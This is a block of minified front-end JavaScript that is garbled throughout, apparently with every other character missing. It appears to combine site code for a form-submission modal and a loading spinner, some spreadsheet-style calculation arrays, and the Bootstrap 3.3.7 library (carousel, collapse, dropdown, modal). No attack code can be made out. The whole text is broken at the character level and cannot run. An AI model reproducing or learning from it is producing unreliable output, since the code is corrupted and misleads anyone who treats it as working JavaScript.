=.isCidoosao&olns|,&torcidoe.egh&rrcidoe[+]rr&.isCid(=&rfrthl)&roaiyn)})com\"nmto\"}euns)vrscsc|}scSinrfnto({ucinee{a =(,=.id\"si\";eunsatfnto({.tr\"iald,\",.tr\"aalaig,\",.pn)oapn(.l}so:ucin)nso(,([oe'rgesa'\".eoe)ermvAt(dsbe\",.eoetr\"aalaig)}fnto ({a =lns1,egh3wdh2rdu:,onr:4rtt:9drcin1clr\"ff,pe:,ri:2sao:1hacl!,lsNm:\"zne:e,o:5%,et\"0\";eunnwSinre.pn)fnto ({=(;(fr\".ped'dvi=mdlpne\"sye\"-ne:100dsly lc;oiinaslt!motn; ls=mdl><pncas\"pn tl=psto:aslt;ipa:boktp0bto:;ih:;et0wdh 0xhih:4p;bre-ais 2xbcgon-oo:#FFFzidx ;agnat;>/pn /i>)rsi(,(#oasinr.pn)apn(.l}ucino)r&rso(,=od0,(#oasinr)rmv(}a =od0rtr{raeesoMdlpne:,etoMdlpne:}(,(ucin)scscb=0vre$\"oy)at(bosrtrg\";&(s.s_s\"re=e,s.tl.hcIBosruprSoaeytm)vrtfnto()vrt$\"frcipttxae,eet)ntfle(:idnyaet)onsraiebete;(#om nu:hcbx)mpfnto({[hsnm]ti.hce?o\"\"f\")vrr[;.ah$\"nu:ie)fnto(,)vrn$t,=.aa\"ie\";ra.sra()|oJO.as(),=.octo};o(a =.egha0aia+o\"l_ied+]ecdUIopnn([]i)rtr od0=.ujc&e&osbetosbetrpae/5r5ng\"\")o;s.omumtouecni(gtsnomaaclbc:ucin)rtr (0})vrn';s.omumtouesoOfieofrainilgfnto({(#flnfrssv-ofrainmdl)mdl\"hw),(.ola-ae-ih\".rpn( dvi=ofieom-umt ls=hdm' bto d'flnfrssbi-t'tp=bto'cas't t-flnfrssbi t-m><pncas'flnfrslg'<sa>sa>fln om<sa><pni=x'cas'ag ag-flnfrssbi'><sa><bto><dv\",(#om\".rpn(\",(#om\".pedn;a =wobo1;od0=scAPAE&s.PNM.egh0&oscAPAEtLwrae),s.lblscGoa|{,s.lblfrSoaescFrSoaels.eIsac(dNm:,flnSoepaefnto(,)$\"x\".tle,(#flnfrssbi-ofrainmdl.ofr\".etescDao.flnSbiWiCutr,>?$\"ofieom-umt)rmvCas\"iee)$\"ofieom-umt)adls(som\")((#flnfrssbi\".eoels(som\",(#flnfrssbi\".dCas\"iee)}clbc_feOfietr:ucinet{(#flnfrssv-ofrainmdl)mdl\"ie)\"ro\"=e&lr()},idwoiircl_nlc=od0wno.uoaen=1wno.eouf[,s.s_s&s.tl.hcIBosruprSoaeytm)&wno.rg_eacocikrcl_nlc,idwrcl_nlc=ucine{rg_eacocik&rg_eacocike,.egh0&wno.uoaen|(idwatsvig!,eTmotfnto({f$\"frsvn\".eoels(hdm\".dCas\"hwe)\"neie\"=scGoa.omtrg)vret!)scGoa.omtrg.trTiFr(,ucine{eTmotfnto({(#omaig)rmvCas\"hwe)adls(hdm\"}50,idwatsvig!}},e)))scscb&scGoa.omtrg.etrTiFrDtFoSoaercl_nlc)scGoa.omtrg.snGtaeFrson(ucine{>?$\"ofieom-umt)rmvCas\"iee)$\"ofieom-umt)adls(som\",(#1)hm():$\"ofieom-umt)rmvCas\"hwe)$\"ofieom-umt)adls(hdm\",(#1)hm()},(#flnfrssbi-t\".lc(ucin)scSinrsoMdlpne(,s.omumtoueclIOlnEs(ucin)scGoa.omtrg.snGtaeFrson(ucine{s.pne.etoMdlpne(;a =s.ilgOfieumtec$\"ofieom-umtcnomto-e-t\".utn\"ee\",(#flnfrssbi-ofrainmdl.oa-oy.no)hm()$\"ofieom-umtcnomto-oa cnom)hm(s.ilgOfieumtofr)$\"ofieom-umtcnomto-e-t\".hw)$\"ofieom-umtcnomto-oa bnln\".tl\"o)$\"ofieom-umtcnomto-oa bnln\".hw)$\"ofieom-umtcnomto-oa\".oa(so\"}}fnto({s.pne.etoMdlpne(,(#flnfrssbi-ttsmdl)mdl\"hw)))wno.flnfrssv_ofrainysbncikfnto()scGoa.omtrg.aeomsflnSbiISoaet!)}wno.flnfrssbi_ofrainysbncikfnto()scfrSbiMdl.alfnielefnto({(#flnfrssbi-ofrainysbn)bto(laig)$\"ofieom-umtcnomto-oa if\".etscDao.flnSbiWi)$\"ofieom-umtcnomto-oa cnom)tx(3Lf\",(#flnfrssbi-ofrainmdl.t-ik)hd(,s.omumtouesbiOcMliom),ucin)$\"ofieom-umtsau-oa\".oa(so\"}}$\"olnfr-umtsau-oa mdldao mdlcnet#flnfrssbi-ttsmdl.oa-ilg.oa-otn\".n\"lc\"fnto()esoPoaain)$ti)coet\"mdl)mdl\"ie))tat.pin=coeutn!,eu:1nwsOTp!,rgesa:1pstoCas\"os-o-ih\"peetulcts!,nlc:ulsoDrto:30,ieuain\"00,ieu:50\"etneTmOt\"00,hwaig\"wn\"hdEsn:lna\"soMto:fdI\"hdMto:fdOt})/!ac/a r2CC=e ra()frvri=;i5i+)arx26i]nwAry1;o(a j0j<;j+{r2CC[i[j=};a r2DD=e ra()frvri=;i5i+)arx26i]nwAry1;o(a j0j<;j+{r2DD[i[j=};a r2HH=e ra()frvri=;i5i+)arx26i]nwAry1;o(a j0j<;j+{r2HH[i[j=};a r2C22=e ra(2;o(a i0i<2i+)arx1C3i]nwAry1;o(a j0j<;j+{r2C22[i[j=};a r2E22=e ra(2;o(a i0i<2i+)arx1E3i]nwAry1;o(a j0j<;j+{r2E22[i[j=};a r2G22=e ra(2;o(a i0i<2i+)arx1G3i]nwAry1;o(a j0j<;j+{r2G22[i[j=};a o3AA0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3CC0[j=\";a o3DD0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3EE0[j=\";a o3FF0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3GG0[j=\";a o3HH0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3II0[j=\";\na o3JJ0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrrwx150nwAry50;o(a j0j<0;j+{o3KK0[j=\";a o3LL0=e ra(0)frvrj=;j50j+)rwx150j]\"}vrec3nwAry)vrec5nwArynwAryarx1C3801,)nwAryarx1C30060)vrec1nwArynwAryarx260040)vrec4nwArynwAryarx260040,e ra(r2DD,,,,);a em=e ra(e ra(r2E22,,,10,e ra(r2E22,,,,);a em=e ra(e ra(r2G22,001,)nwAryarx1G37080)vrec2nwArynwAryarx260040)fnto acdt)arx264[]dt[XE___';r2CC[]0=aa'LW263]vrcK=aa'LW251';r2HH[]0=aa'LW258]arx263[]dt[XE___';a 24dt[XE___1]arx262[]dt[XE___';r2CC[]0=aa'LW243]vrcK=aa'LW231';r2HH[]0=aa'LW238]arx261[]dt[XE___';a 22dt[XE___1]arx260[]dt[XE___';r2CC[]0=aa'LW223]vrcB2(.05;a 21=006)arx1G30[]()vrcB3(.3;a 21=006;r2G22[]0=0;a 21=01)\r a 21=01)arx1G32[]()vrcB5(.9;a 21=00)arx1G33[]()arx1G34[]()arx1G35[]()arx1G36[]()arx1C37[]()arx1E37[]()vrcB0(.)vrcD0(.)vrcB1(.5)vrcD1(.5)arx1G39[]()vrcB3(.8;a 22=00)vrcF3(.8;o3AA0[](\";o3CC0[](AeoI)rwx1500=\")rwx1500=\"nx I)rwx1500=\")rwx1500=\"nx I\";o3HH0[](\";o3II0[](AeoI\";o3JJ0[](\";o3KK0[](AeoV)rwx1500=\")rwx1501=\"axs)rwx1501=\"l#3;ut\";o3DD0[](Ddzr)rwx1501=\"l#3;ut\";o3FF0[](Ddzr)rwx1501=\"l#3;ut\";o3HH0[](Ddzr)rwx1501=\"l#3;ut\";o3JJ0[](Ddzr)rwx1501=\"l#3;ut\";o3LL0[](Ddzr)rwx1502=0;o3CC0[](.4;o3DD0[]()rwx1502=005;o3FF0[]()rwx1502=00)rwx1502=0;o3II0[](.4)rwx1502=0;o3KK0[](.5)\r o3LL0[]()rwx1503=100.1;o3CC0[](.7)rwx1503=54)rwx1503=008;o3FF0[](90;o3GG0[](.1)rwx1503=96)rwx1503=00)rwx1503=80)rwx1503=01)rwx1503=40)rwx1504=300.1;o3CC0[](.9)rwx1504=180;o3EE0[](.)rwx1504=180;o3GG0[](.3)rwx1504=160;o3II0[](.0)rwx1504=140;o3KK0[](.9)rwx1504=90)rwx1505=700.1;o3CC0[](.0)rwx1505=250;o3EE0[](.1)rwx1505=250;o3GG0[](.6;o3HH0[](54)rwx1505=01)rwx1505=370;o3KK0[](.0)rwx1505=110;o3AA0[](800.1;o3CC0[](.4)rwx1506=830;o3EE0[](.4)rwx1506=850;o3GG0[](.1;o3HH0[](260;o3II0[](.2;o3JJ0[](870;o3KK0[](.3;o3LL0[](20)rwx1507=30000)rwx1507=01)rwx1507=380)rwx1507=03;\nrwx1507=700)rwx1507=03)rwx1507=680)rwx1507=03)rwx1507=880)rwx1507=035;o3LL0[](400;a 27(ugnrl500ec1)vrcH=smeea(,,,em);r2C22[]0=(cC)(21))arx1E30[](((((27-arx261[])-arx262[])-arx263[])*cD2);r2C22[]0=(cC)(21))arx1E31[](((((27-arx261[])-arx262[])-arx263[])*cD3);r2C22[]0=(((((arx260[]+arx261[])*00))((((r2CC[]0)(r2CC[]0))(r2CC[]0))(.2))*cB4)+(((((arx260[]+arx261[])*00))((((r2CC[]0)(r2CC[]0))(r2CC[]0))(.2))>200))((((((r2CC[]0)(r2CC[]0))(.8)+(((arx262[]+arx263[])+arx264[])*03)))(400)*01):0));\narx1C33[](((((r2CC[]0)(r2CC[]0))(.2)+(((arx262[]+arx263[])+arx264[])*03)))(21))vrcB6(22;r2C22[]0=((arx261[]-arx261[])*cB6);a 21=cK)arx1E34[](((r2CC[]0)(r2HH[]0))(21))vrcB7(23;r2C22[]0=(((arx262[]+arx263[])+arx264[])*cB7);a 21=cK)arx1E35[]((((r2CC[]0)(r2CC[]0))(r2CC[]0))(21))vrcB8(24;r2C22[]0=(((arx260[]+arx261[])-arx261[])*cB8);a 21=cK)arx1E36[]((((r2CC[]0)(r2CC[]0))(r2HH[]0))(21))arx1C38[]((r2HH[]0)(22))arx1E38[]((r2HH[]0)(22))vrcF0(((r2CC[]0)())(.)())arx1G38[]((r2HH[]0)(22))arx1C39[]((r2HH[]0)(22))arx1E39[]((r2HH[]0)(22))vrcB2(25;r2C22[0[]((r2HH[]0)(22))vrcD2(25;r2E22[0[]((r2HH[]0)(22))vrcF2(((r2CC[]0)())(25:0);r2G22[0[]((r2HH[]0)(22))arx1C31]0=(arx260[]*cB3);\narx1E31]0=(arx260[]*cD3);r2G22[1[]((r2HH[]0)(22))vrcC4(ugnrl1,,,em);r2DD[]0=(ierr(((((27*vnlou3vvr(27,o3AA0,,9,o3CC0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3CC0[]))(2(o3DD0[]))(27)*035):0)))?0:((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3DD0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.3))())))arx261[]((sro(((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3FF0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.2):0)))?0:((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3FF0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.2):0)));r2DD[]0=(ierr(((((27*vnlou3vvr(27,o3AA0,,9,o3GG0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3GG0[]))(2(o3HH0[]))(27)*035):0)))?0:((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3HH0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.3))())))\r r2DD[]0=(ierr(((((27*vnlou3vvr(27,o3AA0,,9,o3II0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3II0[]))(2(o3JJ0[]))(27)*04):0)))?0:((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3JJ0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.))())))arx264[]((sro(((((cC)(2(okpv_a(cC)rwx150049rwx150049))-vnlou3vvr(27,o3AA0,,9,o3LL0,,9)))(27)+((cC)(600))(((((27*vnrwx1506))-vnrwx1506))/cC))(.3))())))()(((((27*vnlou3vvr(27,o3AA0,,9,o3KK0,,9)))(2(okpv_a(cC)rwx150049rwx150049))/cC))(((27>3000)?((((cC)(2(o3KK0[]))(2(o3LL0[]))(27)*025):0)));a m1(((((((((((((27-cH))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[]0))(r2E22[0[])-arx1E31]0))(400)*01);a m2()vrsmn3smMt.a(ahmxNme.EAIEIFNT,m2,m1;a uct_n=;r2E22[]0=((((((((((((cC)(27)-arx1E30[])-arx1E31[])-arx1E34[])-arx1E35[])-arx1E36[])-arx1E38[])-arx1E39[])-arx1E31]0))(r2E22[1[])*cD4)+mx0smn3smsmn3ctec3))\r r2E22[]0=(((((((((((cC)(27)-arx1E30[])-arx1E31[])-arx1E34[])-arx1E35[])-arx1E36[])-arx1E38[])-arx1E39[])-arx1E31]0))(r2E22[1[])*cD5);r2G22[]0=(ierr(upoutec4))()(upoutec4))vrcE4(ugnrl1,,,em);a 22=smeea(,,,em);a 21=(ierr((r2G22[]0)(27))?0:(arx1G37[]/cC)))dt[XE__47]cG4dt[XE__45]cE4dt[XE__43]cC4dt[XE__37]arx1G31]0;aa'LW22_'=r2E22[1[]dt[XE__33]arx1C31]0;aa'LW22_'=r2G22[0[]dt[XE__26]cF2dt[XE__25]arx1E31]0;aa'LW22_'=22;aa'LW22_'=r2C22[0[]dt[XE__22]cB2dt[XE__15]arx1E39[]dt[XE__13]arx1C39[]dt[XE__07]arx1G38[]dt[XE__06]cF0dt[XE__05]arx1E38[]dt[XE__03]arx1C38[]dt[XE__97]arx1G37[]dt[XE__96]cF9dt[XE__85]arx1E36[]dt[XE__84]cD8dt[XE__83]arx1C36[]dt[XE__82]cB8dt[XE__75]arx1E35[]dt[XE__74]cD7\r aa'LW21_'=r2C22[]0;aa'LW21_'=21;aa'LW21_'=r2E22[]0;aa'LW21_'=21;aa'LW21_'=r2C22[]0;aa'LW21_'=21;aa'LW21_'=r2E22[]0;aa'LW21_'=r2C22[]0;aa'LW21_'=r2E22[]0;aa'LW21_'=r2C22[]0;aa'LW21_'=r2E22[]0;aa'LW21_'=r2C22[]0;aa'LW21_'=r2E22[]0;aa'LW21_'=r2C22[]0;aa'LW278]cH;aa'LW273]cC;aa'LW264]arx264[]dt[XE___'=r2DD[]0;aa'LW244]arx262[]dt[XE___'=r2DD[]0;aa'LW224]arx260[]}/!\n*Bosrpv.. ht:/ebosrpcm\r oyih 0121 wte,Ic\r iesdudrteMTlcne\n*\ri(udfnd=tpo QeytrwnwErr\"otta' aacitrqie Qey)+ucina{uesrc\"vrbaf.qeyslt\"\"[]slt\"\";fb0<&b1<|1=[]&=b1&b2<|b0>)ho e ro(BosrpsJvSrp eursjur eso .. rhge,btlwrta eso \"}jur)+ucina{uesrc\"fnto ({a =ouetcetEeet\"otta\",=WbiTasto:wbiTastoEd,oTasto:tastoed,Tasto:orniinn tastoed,rniin\"rniinn\";o(a nbi(od0=asyec)eunedbc}rtr!}.neuaerniinn=ucinb{a =1dti;(hs.n(bTastoEd,ucin)c!};a =ucin)c|()tigraspottasto.n);eunstieu(,)ti}afnto({.upr.rniinb)aspottasto&(.vn.pca.srniinn=bnTp:.upr.rniineddlgtTp:.upr.rniinedhnl:ucinb{fabtre)i(hs)eunbhnlOjhnlrapyti,ruet)}}}jur)+ucina{uesrc\"fnto ()rtr hsec(ucin)vrcati)ecdt(b.lr\";|cdt(b.lr\"enwdti),srn\"=yefb&[]cl())vrc'dt-ims=aet],=ucinb{()o(cik,,hscoe}dVRIN\"..\"dTASTO_UAIN10dpooyecoefnto()fnto ({.eah)tigr\"lsdb.lr\".eoe)vreati)feat(dt-agt)f|feat(he\",=&frpae/*?#^s*),\")vrga\"\"=f[:)b&.rvnDfut)glnt|(=.lss(.lr\")gtigrbaEet\"ls.saet),.sealPeetd)|grmvCas\"n)aspottasto&ghsls(fd\"?.n(bTastoEd,)euaerniinn(.RNIINDRTO)c)}vreaf.lr;.naetbaf.lr.osrco=,.naetnCnlc=ucin)rtr .naeteti}adcmn)o(cikb.lr.aaai,,.rttp.ls)(Qey,fnto()\"s tit;ucinbb{eunti.ahfnto({a =(hs,=.aa\"sbto\",=ojc\"=yefb&;|ddt(b.utn,=e (hsf)\"oge=betgl(:&esttt())vrcfnto(,)ti.eeetab,hsotosaetn(}cDFUT,)ti.sodn=1;.ESO=337,.EALS{odnTx:laig.\",.rttp.eSaefnto()vrc\"iald,=hs$lmn,=.s\"nu\"?vl:hm\"fddt(;+\"et,ul=.eeTx&ddt(rstet,[]),eTmotapoyfnto({[]nl=fb?hsotosb:[],laiget=b(hsiLaig!,.dCasc.trcc.rpc!):hsiLaig&ti.sodn=1drmvCasc.eoetrc.rpc!)}ti)0}cpooyetgl=ucin)vra!,=hs$lmn.lss([aatgl=btos])i(.egh{a =hs$lmn.id\"nu\";rdo=cpo(tp\"?cpo(cekd)&a!)bfn(.cie)rmvCas\"cie)ti.eeetadls(atv\")\"hcbx=cpo(tp\"&(.rp\"hce\"!=hs$lmn.aCas\"cie)&a!)ti.eeettglCas\"cie),.rp\"hce\"ti.eeethsls(atv\")a&.rge(cag\"}leti.eeetat(ai-rse\"!hs$lmn.aCas\"cie),hs$lmn.ogels(atv\"}vrdaf.utnaf.utnbaf.utnCntutrcaf.utnnCnlc=ucin)rtr .nbto=,hs,(ouet.n\"lc.sbto.aaai,[aatgl^\"utn],ucinc{a =(.agt.lss(.t\";.ald\"oge)actre)i(ipttp=rdo] nu[ye\"hcbx])|cpeeteal(,.s\"nu,utn)dtigr\"ou\":.id\"nu:iil,utnvsbe)frt)tigr\"ou\"))o(fcsb.utndt-p lrb.utndt-p\"'dt-oge=bto\"'fnto()abtre)coet\"bn)tglCas\"ou\"/fcsi)$.etbtp)}}jur)+ucina{uesrc\"fnto ()rtr hsec(ucin)vrdati)eddt(b.aosl)faetn(}cDFUT,.aa)\"bet=tpo &b,=srn\"=yefbbfsiee|.aa\"scrue\"enwcti,),nme\"=yefbet()geg(:.nevl&.as(.yl(}}a =ucinbc{hs$lmn=()ti.idctr=hs$lmn.id\"crue-niaos)ti.pin=,hspue=ulti.ldn=ulti.nevlnl,hs$cienl,hs$tm=ulti.pin.ebad&hs$lmn.n\"edw.scrue\"apoyti.edw,hs)\"oe\"=hsotospue&(otuhtr\"ndcmn.ouetlmn)&hs$lmn.n\"osetrb.aosl,.rx(hspueti).n\"oslaeb.aosl,.rx(hscceti)}cVRIN\"..\"cTASTO_UAIN60cDFUT=itra:e,as:hvr,rp!,ebad!}cpooyekyonfnto()i(/nu|etraits(.agttgae)sic(.hc)cs 7ti.rv)bekcs 9ti.et)bekdfutrtr}.rvnDfut)}cpooyeccefnto()rtr |(hspue=1,hsitra&cernevlti.nevl,hsotositra&!hspue&(hsitra=eItra(.rx(hsnx,hs,hsotositra),hs,.rttp.eIeIdxfnto()rtr hs$tm=.aet)cide(.tm)ti.iesidxa|hs$cie}cpooyegttmoDrcinfnto(,)vrcti.eIeIdxb,=pe\"=&0=c|nx\"=&c=hs$tm.egh1i(&!hsotoswa)eunbvre\"rv=a-:,=ce%hs$tm.eghrtr hs$tm.qf}cpooyet=ucina{a =hscti.eIeIdxti.atv=hs$lmn.id\"ie.cie);f!ati.ieslnt-|a0)eunti.ldn?hs$lmn.n(si.scrue\"fnto({.oa}:=ati.as(.yl(:hssieac\"et:pe\"ti.iese()}cpooyepuefnto()rtr |(hspue=0,hs$lmn.id\"nx,.rv)lnt&aspottasto&(hs$lmn.rge(.upr.rniined,hscce!),hsitra=laItra(hsitra)ti}cpooyenx=ucin)i(ti.ldn)eunti.ld(nx\"}cpooyepe=ucin)i(ti.ldn)eunti.ld(pe\"}cpooyesiefnto(,)vreti.eeetfn(.tmatv\",=|ti.eIeFrieto(,)gti.nevlh\"et=b\"et:rgt,=hsi(.aCas\"cie)rtr hssiig!;a =[]kaEet\"ld.scrue\"{eaeTre:,ieto:};fti.eeettigrk,kiDfutrvne()i(hssiig!,&ti.as(,hs$niaoslnt)ti.idctr.id\"atv\".eoels(atv\";a =(hs$niaoscide([hsgttmne())l&.dCas\"cie)vrmaEet\"ldb.aosl,rltdagtjdrcinh)rtr .upr.rniin&hs$lmn.aCas\"ld\"?fadls()f0.fstit,.dCash,.dCash,.n(bTastoEd,ucin)frmvCas[,]ji( ).dCas\"cie)ermvCas[atv\"h.on\"\")isiig!,eTmotfnto({.eeettigrm}0}.mltTastoEdcTASTO_UAIN)(.eoels(atv\",.dCas\"cie)ti.ldn=1ti.eeettigrm)g&hscce)ti};a =.ncrue;.ncrue=,.ncrue.osrco=,.ncrue.oofitfnto({eunaf.aosldti}vrefnto()vrdeati)faeat(dt-agt)|deat(he\")&.elc(.(=[\\]$/\");ffhsls(crue\")vrgaetn(}fdt(,.aa),=.tr\"aasiet\";&(.nevl!)bcl(,)h&.aa\"scrue\".oh,.rvnDfut)}adcmn)o(cikb.aosldt-p\"\"dt-ld],)o(cikb.aosldt-p\"\"dt-ld-o\"e,(idw.n\"od,ucin)a'dt-ie\"aosl])ec(ucin)vrcati)bcl(,.aa)}}}jur)+ucina{uesrc\"fnto ()vrcdbat(dt-agt)|cbat(he\")&.elc(.(=[\\]$/\")rtr ()fnto ()rtr hsec(ucin)vrcati)ecdt(b.olpe)faetn(}dDFUT,.aa)\"bet=tpo &b;e&.oge&so|ie.etb&(.oge!)e|.aa\"sclas\"enwdti,),srn\"=yefb&[]))vrdfnto(,)ti.eeetab,hsotosaetn(}dDFUT,)ti.tigra'dt-oge\"olpe]he=#+.d'][aatgl=clas\"[aatre=#+.d'])ti.rniinn=ulti.pin.aetti.prn=hsgtaet)ti.dAiAdolpeCasti.eeetti.tigr,hsotostgl&ti.oge);.ESO=337,.RNIINDRTO=5,.EALS{oge!}dpooyedmninfnto({a =hs$lmn.aCas\"it\";euna\"it\"\"egt}dpooyeso=ucin)i(ti.rniinn&!hs$lmn.aCas\"n){a ,=hs$aet&hs$aetcide(.ae\".hlrn\"i,.olpig)i((&elnt&(=.aa\"sclas\",&btastoig){a =.vn(so.sclas\";fti.eeettigrf,fiDfutrvne()e&.egh&ccl(,hd\",|edt(b.olpe,ul)vrgti.ieso(;hs$lmn.eoels(clas\".dCas\"olpig)g()at(ai-xadd,0,hs$rge.eoels(clasd)at(ai-xadd,0,hstastoig1vrhfnto({hs$lmn.eoels(clasn\".dCas\"olpei\"[]\")ti.rniinn=,hs$lmn.rge(sonb.olpe);f!.upr.rniinrtr .alti)vriacmlae[srl\"g.on\"\")ti.eeetoe\"srniinn\"apoyhti).mltTastoEddTASTO_UAIN[]ti.eeet0[]}},.rttp.iefnto({f!hstastoig&hs$lmn.aCas\"n){a =.vn(hd.sclas\";fti.eeettigrb,biDfutrvne()vrcti.ieso(;hs$lmn[]ti.eeetc()0.fstegtti.eeetadls(clasn\".eoels(clas n)at(ai-xadd,1,hs$rge.dCas\"olpe\".tr\"raepne\"!)ti.rniinn=;a =ucin)ti.rniinn=,hs$lmn.eoels(clasn\".dCas\"olpe)tigr\"idnb.olpe);eunaspottasto?odti.eeetc()oe\"srniinn\"apoyeti).mltTastoEddTASTO_UAIN:.alti)},.rttp.ogefnto({hsti.eeethsls(i\"?hd\"\"hw]),.rttp.ePrn=ucin)rtr (hsotosprn)fn([aatgl=clas\"[aaprn='ti.pin.aet'])ec(.rx(ucincd{a =()ti.dAiAdolpeCasbe,),hs)ed),.rttp.dAiAdolpeCasfnto(,)vrcahsls(i\";.tr\"raepne\"c,.ogels(clasd,c.tr\"raepne\"c}vreaf.olpeaf.olpecaf.olpeCntutrdaf.olpenCnlc=ucin)rtr .nclas=,hs,(ouet.n\"lc.sclas.aaai,[aatgl=clas\"'fnto()vreati)eat(dt-agt)|.rvnDfut)vrfbe,=.aa\"sclas\",=?tgl\"edt(;.alfh}}jur)+ucina{uesrc\"fnto ()vrcbat(dt-agt)c|cbat(he\",=&/[-az/ts()&.elc(.(=[\\]$/\");a =∾eund&.eghdbprn(}ucincc{&3=cwih|ae.eoe)af.ahfnto({a =(hs,=()f{eaeTre:hs;.aCas\"pn)&c&cik=ctp&/nu|etraits(.agttgae&acnan([]ctre)|etigrcaEet\"ieb.rpon,),.sealPeetd)|dat(ai-xadd,fle)ermvCas\"pn)tigraEet\"idnb.rpon,))))}ucindb{eunti.ahfnto({a =(hs,=.aa\"sdodw\";|cdt(b.rpon,=e (hs)\"tig=tpo &db.alc}}a =.rponbcdo\"f'dt-oge\"rpon],=ucinb{()o(cikb.rpon,hstgl);.ESO=337,.rttp.ogefnto()vreati)i(ei(.iald dsbe\")vrfbe,=.aCas\"pn)i((,g{otuhtr\"ndcmn.ouetlmn&!.lss(.abrnv)lnt&adcmn.raelmn(dv).dCas\"rponbcdo\".netfe((hs)o(cik,)vrh{eaeTre:hs;fftigrdaEet\"hwb.rpon,),.sealPeetd)rtr;.rge(fcs)at(ai-xadd,tu\",.ogels(oe\".rge(.vn(sonb.rpon,)}eun1}gpooyekyonfnto()i((84|73).etcwih&!ipttxae/.etctre.aNm){a =(hs;fcpeeteal(,.tprpgto(,di(.iald dsbe\")vrebd,=.aCas\"pn)i(g&7=.hc|g&7=.hc)eun2=cwih&.idf.rge(fcs)dtigr\"lc\";a = int.iald:iil \"iefn(.rponmn\"h;filnt)vrjiidxctre)3=cwih&>&j-4=cwih&<.egh1&+,j|j0,.qj.rge(fcs)}}vrhaf.rponaf.rpondaf.rponCntutrgaf.rponnCnlc=ucin)rtr .ndodw=,hs,(ouet.n\"lc.sdodw.aaai,)o(cikb.rpondt-p\"\"dodw om,ucina{.tprpgto(}.n\"lc.sdodw.aaai,,.rttp.oge.n\"edw.sdodw.aaai,,.rttp.edw)o(kyonb.rpondt-p\"\"dodw-eu,.rttp.edw)(Qey,fnto()\"s tit;ucinbbd{eunti.ahfnto({a =(hs,=.aa\"smdl)gaetn(}cDFUT,.aa)\"bet=tpo &b;|edt(b.oa\"fnwcti,),srn\"=yefbfb()gso&fso())vrcfnto(,)ti.pin=,hs$oyadcmn.oy,hs$lmn=()ti.dao=hs$lmn.id\"mdldao\",hs$akrpnl,hsiSonnl,hsoiiaBdPdnl,hssrlbrit=,hsinrBcdoCik!,hsotosrmt&ti.eeetfn(.oa-otn\".odti.pin.eoeapoyfnto({hs$lmn.rge(lae.smdl),hs);.ESO=337,.RNIINDRTO=0,.AKRPTASTO_UAIN10cDFUT=bcdo:0kyor:0so:0,.rttp.ogefnto()rtr hsiSonti.ie)ti.hwa}cpooyeso=ucinb{a =hseaEet\"hwb.oa\"{eaeTre:};hs$lmn.rge()ti.shw|eiDfutrvne(|(hsiSon!,hscekcola(,hsstcola(,hs$oyadls(mdloe\",hsecp(,hsrsz(,hs$lmn.n\"lc.ims.smdl,[aadsis\"oa\"'apoyti.ieti),hs$ilgo(mueondsisb.oa\"fnto({.eeetoe\"osu.ims.smdl,ucinb{(.agt.sd$lmn)&dinrBcdoCik!)))ti.akrpfnto({a =.upr.rniin&.eeethsls(fd\";.eeetprn(.egh|.eeetapnT(.bd)d$lmn.hw)srlTp0,.dutilg)e&.eeet0.fstit,.eeetadls(i\",.nocFcs)vrfaEet\"hw.smdl,rltdagtb)ed$ilgoe\"srniinn\"fnto({.eeettigr\"ou\".rge())euaerniinn(.RNIINDRTO)d$lmn.rge(fcs)tigrf}),.rttp.iefnto()b&.rvnDfut)baEet\"ieb.oa\",hs$lmn.rge()ti.shw&!.sealPeetd)&ti.shw=1ti.sae)ti.eie)adcmn)of\"oui.smdl)ti.eeetrmvCas\"n)of\"lc.ims.smdl)of\"osu.ims.smdl)ti.dao.f(mueondsisb.oa\",.upr.rniin&hs$lmn.aCas\"ae)ti.eeetoe\"srniinn\"apoyti.ieoa,hs)euaerniinn(.RNIINDRTO)ti.ieoa(),.rttp.nocFcsfnto({(ouet.f(fcsnb.oa\".n\"oui.smdl,.rx(ucina{ouet=atre|ti.eeet0==.agt|hs$lmn.a(.agt.egh|hs$lmn.rge(fcs),hs),.rttp.saefnto({hsiSon&hsotoskyor?hs$lmn.n\"edw.ims.smdl,.rx(ucina{7=.hc&ti.ie),hs)ti.shw|ti.eeetof\"edw.ims.smdl),.rttp.eiefnto({hsiSonawno)o(rsz.smdl,.rx(hshnlUdt,hs)awno)of\"eieb.oa\"}cpooyehdMdlfnto({a =hsti.eeethd(,hsbcdo(ucin)a$oyrmvCas\"oa-pn)arstdutet(,.eeSrlbr)a$lmn.rge(hde.smdl)),.rttp.eoeakrpfnto({hs$akrp&hs$akrprmv(,hs$akrpnl}cpooyebcdo=ucinb{a =hseti.eeethsls(fd\"?fd\"\";fti.shw&ti.pin.akrp{a =.upr.rniin&;fti.bcdo=(ouetcetEeet\"i\")adls(mdlbcdo 